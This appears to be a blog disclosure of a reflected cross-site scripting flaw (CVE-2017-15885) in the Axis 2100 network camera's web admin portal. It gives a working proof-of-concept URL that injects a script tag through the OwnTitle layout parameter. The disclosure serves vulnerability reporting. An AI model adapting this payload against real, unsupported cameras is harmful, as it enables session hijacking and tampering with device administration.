Axis 2100 Network Camera 2.03 XSS Vulnerability

Update: this has been assigned CVE-2017-15885.

I have found a vulnerability in the Axis 2100 Network Camera running 2.03 firmware.  Vulnerability has been disclosed to the vendor but the camera is no longer supported.

Reflected XSS in web administration portal in Axis 2100 Network Camera 2.03 allows attacker to execute arbitrary javascript via URL.

POC Verified on Firefox 55.0.3:

http://xxx.xxx.xxx,xxx/view/view.shtml?paramskip=yes&conf_Layout_BGColorEnabled=yes&conf_Layout_OwnBGColorEnabled=no&conf_Layout_OwnBGColor=White&conf_Layout_TextColorEnabled=yes&conf_Layout_OwnTextColorEnabled=no&conf_Layout_OwnTextColor=Black&conf_Layout_BackgroundEnabled=yes&conf_Layout_OwnBackgroundEnabled=no&conf_Layout_OwnBackground=http://&conf_Layout_TitleEnabled=yes&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert('test')%3C/script%3E&conf_Layout_LogoEnabled=yes&conf_Layout_OwnLogoEnabled=no&conf_Layout_OwnLogo=http%3A//&conf_Layout_LinkEnabled=yes&conf_Layout_OwnLinkEnabled=no&conf_Layout_OwnLink=http%3A//&conf_Layout_DescriptionEnabled=yes&conf_Layout_OwnDescriptionEnabled=no&conf_Layout_OwnDescription=&conf_Layout_RelayButtonsEnabled=yes&conf_Layout_AdminButtonsEnabled=yes&conf_Layout_LayoutEnabled=no

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s